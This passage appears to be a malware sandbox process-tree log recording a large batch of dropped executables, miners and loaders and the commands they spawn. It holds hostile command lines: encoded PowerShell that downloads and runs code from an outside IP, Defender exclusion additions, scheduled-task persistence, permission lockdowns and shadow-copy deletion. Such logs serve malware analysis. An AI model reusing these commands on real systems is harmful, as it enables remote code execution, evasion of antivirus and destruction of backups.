C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe
"C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe"
3⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe
C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe
4⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe
C:\Users\Admin\AppData\Local\Temp\Rxignoyvluyblaysccxyah.exe
4⤵
PID:7124

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
3⤵
PID:2460

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
3⤵
PID:2116

C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
2⤵
PID:312

C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\blessedjayzx.exe"
3⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
2⤵
PID:5296

C:\Users\Admin\AppData\Local\Temp\a\obi.exe
"C:\Users\Admin\AppData\Local\Temp\a\obi.exe"
2⤵
PID:5140

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rqrBaKxCBepz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp319A.tmp"
3⤵
- Creates scheduled task(s)
PID:5164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
3⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
2⤵
PID:3104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "test" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\test.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a\test.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\test.exe"
3⤵
PID:3716

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe"
2⤵
PID:3500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe"
3⤵
PID:5908

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5908" "1748" "1628" "1744" "0" "0" "1752" "0" "0" "0" "0" "0"
4⤵
PID:6044

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NRxRXfYhgW" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDC2.tmp"
3⤵
- Creates scheduled task(s)
PID:1540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NRxRXfYhgW.exe"
3⤵
PID:4552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe
"C:\Users\Admin\AppData\Local\Temp\a\fotocr23.exe"
2⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y7167260.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y7167260.exe
3⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\m7194428.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\m7194428.exe
4⤵
PID:6496

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe"
5⤵
PID:5148

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe" /F
6⤵
- Creates scheduled task(s)
PID:6384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\c3912af058" /P "Admin:N"&&CACLS "..\c3912af058" /P "Admin:R" /E&&Exit
6⤵
PID:5348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:5700

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
7⤵
PID:6496

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
7⤵
PID:6564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:5680

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:N"
7⤵
PID:1668

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:R" /E
7⤵
PID:2460

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
6⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n0295672.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n0295672.exe
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n0295672.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n0295672.exe
4⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\a\test (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\test (2).exe"
2⤵
PID:2740

C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe
"C:\Users\Admin\AppData\Local\Temp\a\foto0174.exe"
2⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x3000594.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x3000594.exe
3⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x4532727.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x4532727.exe
4⤵
PID:1352

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3833241.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\g3833241.exe
5⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h6194423.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\h6194423.exe
4⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i9026056.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i9026056.exe
3⤵
PID:6612

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i9026056.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\i9026056.exe
4⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (5).exe"
2⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe
"C:\Users\Admin\AppData\Local\Temp\a\SCMB.exe"
2⤵
PID:4224

C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
"C:\Users\Admin\AppData\Local\Temp\a\bebra.exe"
2⤵
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\bebra.exe
3⤵
PID:6924

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe
"C:\Users\Admin\AppData\Local\Temp\a\loaderx.exe"
2⤵
PID:6252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
3⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\a\setup (3).exe
"C:\Users\Admin\AppData\Local\Temp\a\setup (3).exe"
2⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 552
3⤵
- Program crash
PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 628
3⤵
- Program crash
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 720
3⤵
- Program crash
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 768
3⤵
- Program crash
PID:5624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 856
3⤵
- Program crash
PID:6980

C:\Users\Admin\AppData\Local\Temp\a\build.exe
"C:\Users\Admin\AppData\Local\Temp\a\build.exe"
2⤵
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\build.exe
3⤵
PID:5328

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe
"C:\Users\Admin\AppData\Local\Temp\a\ppls25.exe"
2⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
2⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
3⤵
PID:512

C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe
"C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe"
2⤵
PID:1368

C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe
"C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe"
3⤵
PID:3488

C:\Program Files (x86)\LuckyWheel\WindowsServices.exe
"C:\Program Files (x86)\LuckyWheel\WindowsServices.exe"
3⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\a\miner.exe
"C:\Users\Admin\AppData\Local\Temp\a\miner.exe"
2⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\a\KK.exe
"C:\Users\Admin\AppData\Local\Temp\a\KK.exe"
2⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\a\360.exe
"C:\Users\Admin\AppData\Local\Temp\a\360.exe"
2⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\a\word.exe
"C:\Users\Admin\AppData\Local\Temp\a\word.exe"
2⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\a\portable.exe
"C:\Users\Admin\AppData\Local\Temp\a\portable.exe"
2⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\a\malwr.exe
"C:\Users\Admin\AppData\Local\Temp\a\malwr.exe"
2⤵
PID:6448

C:\Windows\system32\cmd.exe
cmd.exe /C vssadmin.exe delete shadows /all /quiet
3⤵
PID:4520

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:6984

C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
2⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
3⤵
PID:6840

C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe"
2⤵
PID:1792

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\a\file.exe
"C:\Users\Admin\AppData\Local\Temp\a\file.exe"
2⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:2800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:4624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
PID:4212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
2⤵
PID:7132

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
2⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
3⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\build (2).exe"
2⤵
PID:6284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
3⤵
PID:6040

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
2⤵
PID:3988

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
2⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
3⤵
PID:3976

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
2⤵
PID:2108

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
3⤵
PID:7200

C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
3⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"
2⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
3⤵
PID:7636

C:\Program Files (x86)\1683856307_0\360TS_Setup.exe
"C:\Program Files (x86)\1683856307_0\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
4⤵
PID:7480

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
2⤵
PID:704

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOktOFpaLKGPz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp565A.tmp"
3⤵
- Creates scheduled task(s)
PID:5308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IOktOFpaLKGPz.exe"
3⤵
PID:7352

C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
3⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe"
2⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe
"C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe" C:\Users\Admin\AppData\Local\Temp\qjvqkpi.odu
3⤵
PID:7104

C:\Users\Admin\AppData\Local\Temp\a\calcinstall.exe
"C:\Users\Admin\AppData\Local\Temp\a\calcinstall.exe"
2⤵
PID:1912

C:\Users\Admin\AppData\Local\Temp\smcalc.exe
"C:\Users\Admin\AppData\Local\Temp\smcalc.exe"
3⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\is-NDUT7.tmp\smcalc.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NDUT7.tmp\smcalc.tmp" /SL5="$5003C,32947792,832512,C:\Users\Admin\AppData\Local\Temp\smcalc.exe"
4⤵
PID:2892

C:\Users\Admin\AppData\Local\Temp\smcalc.exe
"C:\Users\Admin\AppData\Local\Temp\smcalc.exe" /SILENT
5⤵
PID:6832

C:\Users\Admin\AppData\Local\Temp\is-JTR5K.tmp\smcalc.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JTR5K.tmp\smcalc.tmp" /SL5="$7017C,32947792,832512,C:\Users\Admin\AppData\Local\Temp\smcalc.exe" /SILENT
6⤵
PID:4244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /f /im "Calculator.exe"
7⤵
- Kills process with taskkill
PID:4140

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /f /im "sxcon.exe"
7⤵
- Kills process with taskkill
PID:4020

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /f /im "Calculator.exe"
7⤵
- Kills process with taskkill
PID:6896

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /f /im "sxcon.exe"
7⤵
- Kills process with taskkill
PID:7532

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /f /im "sxcon.exe"
7⤵
- Kills process with taskkill
PID:5492

C:\Users\Admin\AppData\Roaming\HamsterSoft\sxcon.exe
"C:\Users\Admin\AppData\Roaming\HamsterSoft\sxcon.exe"
7⤵
PID:288

C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (6).exe"
2⤵
PID:6844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:3644

C:\Users\Admin\AppData\Local\Temp\a\dan.exe
"C:\Users\Admin\AppData\Local\Temp\a\dan.exe"
2⤵
PID:596

C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe
"C:\Users\Admin\AppData\Local\Temp\a\nxmr.exe"
2⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (7).exe"
2⤵
PID:2900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:5488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:716

C:\Users\Admin\AppData\Local\Temp\a\services.exe
"C:\Users\Admin\AppData\Local\Temp\a\services.exe"
2⤵
PID:652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
3⤵
PID:4356

C:\Users\Admin\AppData\Local\Temp\a\install.exe
"C:\Users\Admin\AppData\Local\Temp\a\install.exe"
2⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\a\install.exe
C:\Users\Admin\AppData\Local\Temp\a\install.exe
3⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\a\install.exe
C:\Users\Admin\AppData\Local\Temp\a\install.exe
3⤵
PID:996

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe"
2⤵
PID:2668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
3⤵
PID:6380

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Scnolxsyquote .pdf"
3⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
2⤵
PID:6984

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
3⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe"
2⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe
"C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe"
2⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe" C:\Users\Admin\AppData\Local\Temp\tzehxhtbqdr.f
3⤵
PID:2592

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
4⤵
PID:1912

C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe
"C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe"
2⤵
PID:5264

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
3⤵
- Kills process with taskkill
PID:6576

\??\c:\dan.exe
c:\dan.exe
3⤵
PID:6412

C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe"
2⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe"
2⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe"
2⤵
PID:924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:7468

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:7544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:7512

C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
"C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
2⤵
PID:2072

C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe"
2⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\a\build2 (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\build2 (2).exe"
2⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\a\build2 (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\build2 (2).exe"
3⤵
PID:7228

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
2⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
3⤵
PID:7984

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
2⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
3⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
2⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
3⤵
PID:6600

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
2⤵
PID:6220

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:7292

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
2⤵
PID:7316

C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
2⤵
